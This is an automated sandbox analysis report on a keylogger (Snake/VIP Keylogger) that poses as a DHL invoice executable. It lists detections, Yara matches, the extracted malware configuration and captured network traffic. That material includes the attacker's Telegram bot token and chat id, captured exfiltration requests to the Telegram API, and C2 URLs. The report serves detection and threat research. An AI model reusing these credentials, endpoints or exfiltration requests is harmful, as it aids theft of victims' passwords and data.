Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
DHL DOC INV 191224.gz.exe

Overview

General Information

Sample name:DHL DOC INV 191224.gz.exe
Analysis ID:1583321
MD5:49a44e1bd7ae31824843c4316f35eb35
SHA1:29ca56d04c4d089d7aa30df2d3480988da425fc0
SHA256:9ea5173104481c6538cb5fcdadc74682b3d422750039ab3311afe694e59b4602
Tags:DHLexeSnakeKeyloggeruser-cocaman
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found API chain indicative of sandbox detection
Machine Learning detection for sample
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Yara detected Generic Downloader
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • DHL DOC INV 191224.gz.exe (PID: 2612 cmdline: "C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe" MD5: 49A44E1BD7AE31824843C4316F35EB35)
    • RegSvcs.exe (PID: 6608 cmdline: "C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot7289689475:AAGFe7RPg26YJkJcwIEyxRK_I9DsBw4teZU/sendMessage"}

Threatname: VIP Keylogger

{"Exfil Mode": "Telegram", "Bot Token": "7289689475:AAGFe7RPg26YJkJcwIEyxRK_I9DsBw4teZU", "Chat id": "7360475312", "Version": "4.4"}

Threatname: Snake Keylogger

{"Exfil Mode": "Telegram", "Token": "7289689475:AAGFe7RPg26YJkJcwIEyxRK_I9DsBw4teZU", "Chat_id": "7360475312", "Version": "4.4"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.2053416462.0000000000DC0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000000.00000002.2053416462.0000000000DC0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
      00000000.00000002.2053416462.0000000000DC0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
        00000000.00000002.2053416462.0000000000DC0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
          00000000.00000002.2053416462.0000000000DC0000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
          • 0x26a26:$a1: get_encryptedPassword
          • 0x26d1f:$a2: get_encryptedUsername
          • 0x26836:$a3: get_timePasswordChanged
          • 0x2693f:$a4: get_passwordField
          • 0x26a3c:$a5: set_encryptedPassword
          • 0x2801a:$a7: get_logins
          • 0x27f7d:$a10: KeyLoggerEventArgs
          • 0x27c06:$a11: KeyLoggerEventArgsEventHandler
          Click to see the 15 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          2.2.RegSvcs.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            2.2.RegSvcs.exe.400000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
              2.2.RegSvcs.exe.400000.0.unpackJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
                2.2.RegSvcs.exe.400000.0.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                  2.2.RegSvcs.exe.400000.0.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
                  • 0x26a26:$a1: get_encryptedPassword
                  • 0x26d1f:$a2: get_encryptedUsername
                  • 0x26836:$a3: get_timePasswordChanged
                  • 0x2693f:$a4: get_passwordField
                  • 0x26a3c:$a5: set_encryptedPassword
                  • 0x2801a:$a7: get_logins
                  • 0x27f7d:$a10: KeyLoggerEventArgs
                  • 0x27c06:$a11: KeyLoggerEventArgsEventHandler
                  Click to see the 12 entries

                  Sigma Signatures

                  No Sigma rule has matched

                  Suricata Signatures

                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-02T13:45:10.132397+010028033053Unknown Traffic192.168.2.549706188.114.97.3443TCP
                  2025-01-02T13:45:38.151146+010028033053Unknown Traffic192.168.2.549818188.114.97.3443TCP
                  2025-01-02T13:45:39.381953+010028033053Unknown Traffic192.168.2.549825188.114.97.3443TCP
                  2025-01-02T13:45:42.319795+010028033053Unknown Traffic192.168.2.549841188.114.97.3443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-02T13:45:07.967448+010028032742Potentially Bad Traffic192.168.2.549704193.122.130.080TCP
                  2025-01-02T13:45:09.561231+010028032742Potentially Bad Traffic192.168.2.549704193.122.130.080TCP
                  2025-01-02T13:45:21.795605+010028032742Potentially Bad Traffic192.168.2.549707193.122.130.080TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-02T13:45:47.901899+010018100081Potentially Bad Traffic192.168.2.549879149.154.167.220443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-02T13:45:46.844932+010018100071Potentially Bad Traffic192.168.2.549868149.154.167.220443TCP

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Found malware configuration
                  Source: 00000002.00000002.4475356588.00000000030A1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "7289689475:AAGFe7RPg26YJkJcwIEyxRK_I9DsBw4teZU", "Chat_id": "7360475312", "Version": "4.4"}
                  Source: 2.2.RegSvcs.exe.400000.0.unpackMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "Telegram", "Bot Token": "7289689475:AAGFe7RPg26YJkJcwIEyxRK_I9DsBw4teZU", "Chat id": "7360475312", "Version": "4.4"}
                  Source: RegSvcs.exe.6608.2.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7289689475:AAGFe7RPg26YJkJcwIEyxRK_I9DsBw4teZU/sendMessage"}
                  Multi AV Scanner detection for submitted file
                  Source: DHL DOC INV 191224.gz.exeVirustotal: Detection: 47%Perma Link
                  Source: DHL DOC INV 191224.gz.exeReversingLabs: Detection: 73%
                  AI detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Machine Learning detection for sample
                  Source: DHL DOC INV 191224.gz.exeJoe Sandbox ML: detected

                  Location Tracking

                  barindex
                  Tries to detect the country of the analysis system (by using the IP)
                  Source: unknownDNS query: name: reallyfreegeoip.org
                  Source: DHL DOC INV 191224.gz.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49705 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 192.168.2.5:49706 -> 188.114.97.3:443 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49868 version: TLS 1.2
                  Source: Binary string: wntdll.pdbUGP source: DHL DOC INV 191224.gz.exe, 00000000.00000003.2050803231.0000000003880000.00000004.00001000.00020000.00000000.sdmp, DHL DOC INV 191224.gz.exe, 00000000.00000003.2051726881.00000000036E0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdb source: DHL DOC INV 191224.gz.exe, 00000000.00000003.2050803231.0000000003880000.00000004.00001000.00020000.00000000.sdmp, DHL DOC INV 191224.gz.exe, 00000000.00000003.2051726881.00000000036E0000.00000004.00001000.00020000.00000000.sdmp
                  Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exeCode function: 0_2_0039DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_0039DBBE
                  Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exeCode function: 0_2_0036C2A2 FindFirstFileExW,0_2_0036C2A2
                  Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exeCode function: 0_2_003A68EE FindFirstFileW,FindClose,0_2_003A68EE
                  Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exeCode function: 0_2_003A698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_003A698F
                  Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exeCode function: 0_2_0039D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0039D076
                  Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exeCode function: 0_2_0039D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0039D3A9
                  Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exeCode function: 0_2_003A9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_003A9642
                  Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exeCode function: 0_2_003A979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_003A979D
                  Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exeCode function: 0_2_003A9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_003A9B2B
                  Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exeCode function: 0_2_003A5C97 FindFirstFileW,FindNextFileW,FindClose,0_2_003A5C97
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 015AF2EDh2_2_015AF150
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 015AF2EDh2_2_015AF33C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 015AF2EDh2_2_015AF3BF

                  Networking

                  barindex
                  Suricata IDS alerts for network traffic
                  Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49879 -> 149.154.167.220:443
                  Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.5:49868 -> 149.154.167.220:443
                  Uses the Telegram API (likely for C&C communication)
                  Source: unknownDNS query: name: api.telegram.org
                  Yara detected Generic Downloader
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.DHL DOC INV 191224.gz.exe.dc0000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.2053416462.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:642294%0D%0ADate%20and%20Time:%2004/01/2025%20/%2001:55:27%0D%0ACountry%20Name:%20%0D%0A%5B%20642294%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot7289689475:AAGFe7RPg26YJkJcwIEyxRK_I9DsBw4teZU/sendDocument?chat_id=7360475312&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd2c94d88c6ec6Host: api.telegram.orgContent-Length: 580
                  Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                  Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                  Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                  Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: unknownDNS query: name: checkip.dyndns.org
                  Source: unknownDNS query: name: reallyfreegeoip.org
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49707 -> 193.122.130.0:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49704 -> 193.122.130.0:80
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49706 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49818 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49825 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49841 -> 188.114.97.3:443
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49705 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 192.168.2.5:49706 -> 188.114.97.3:443 version: TLS 1.0
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exeCode function: 0_2_003ACE44 InternetReadFile,SetEvent,GetLastError,SetEvent,0_2_003ACE44
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:642294%0D%0ADate%20and%20Time:%2004/01/2025%20/%2001:55:27%0D%0ACountry%20Name:%20%0D%0A%5B%20642294%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                  Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                  Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                  Source: unknownHTTP traffic detected: POST /bot7289689475:AAGFe7RPg26YJkJcwIEyxRK_I9DsBw4teZU/sendDocument?chat_id=7360475312&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd2c94d88c6ec6Host: api.telegram.orgContent-Length: 580
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 02 Jan 2025 12:45:46 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                  Source: RegSvcs.exe, 00000002.00000002.4475356588.00000000031A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?L
                  Source: DHL DOC INV 191224.gz.exe, 00000000.00000002.2053416462.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4474302857.0000000000402000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                  Source: DHL DOC INV 191224.gz.exe, 00000000.00000002.2053416462.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4475356588.00000000030A1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4474302857.0000000000402000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                  Source: DHL DOC INV 191224.gz.exe, 00000000.00000002.2053416462.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4475356588.00000000030A1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4474302857.0000000000402000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                  Source: RegSvcs.exe, 00000002.00000002.4475356588.00000000031D5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                  Source: RegSvcs.exe, 00000002.00000002.4475356588.00000000030A1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4475356588.0000000003186000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                  Source: RegSvcs.exe, 00000002.00000002.4475356588.00000000030A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                  Source: DHL DOC INV 191224.gz.exe, 00000000.00000002.2053416462.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4474302857.0000000000402000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                  Source: RegSvcs.exe, 00000002.00000002.4475356588.00000000030A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: DHL DOC INV 191224.gz.exe, 00000000.00000002.2053416462.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4475356588.00000000030A1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4474302857.0000000000402000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                  Source: RegSvcs.exe, 00000002.00000002.4476505494.00000000040C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                  Source: RegSvcs.exe, 00000002.00000002.4475356588.00000000031A5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4475356588.0000000003186000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                  Source: RegSvcs.exe, 00000002.00000002.4475356588.00000000031A5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4475356588.0000000003186000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4474302857.0000000000402000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                  Source: RegSvcs.exe, 00000002.00000002.4475356588.0000000003186000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                  Source: RegSvcs.exe, 00000002.00000002.4475356588.0000000003186000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:642294%0D%0ADate%20a
                  Source: RegSvcs.exe, 00000002.00000002.4475356588.00000000031A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7289689475:AAGFe7RPg26YJkJcwIEyxRK_I9DsBw4teZU/sendDocument?chat_id=7360
                  Source: RegSvcs.exe, 00000002.00000002.4476505494.00000000040C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                  Source: RegSvcs.exe, 00000002.00000002.4476505494.00000000040C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                  Source: RegSvcs.exe, 00000002.00000002.4476505494.00000000040C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                  Source: RegSvcs.exe, 00000002.00000002.4475356588.0000000003258000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4475356588.0000000003249000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                  Source: RegSvcs.exe, 00000002.00000002.4475356588.0000000003249000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en(
                  Source: RegSvcs.exe, 00000002.00000002.4475356588.0000000003253000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlBsq
                  Source: RegSvcs.exe, 00000002.00000002.4476505494.00000000040C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: RegSvcs.exe, 00000002.00000002.4476505494.00000000040C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
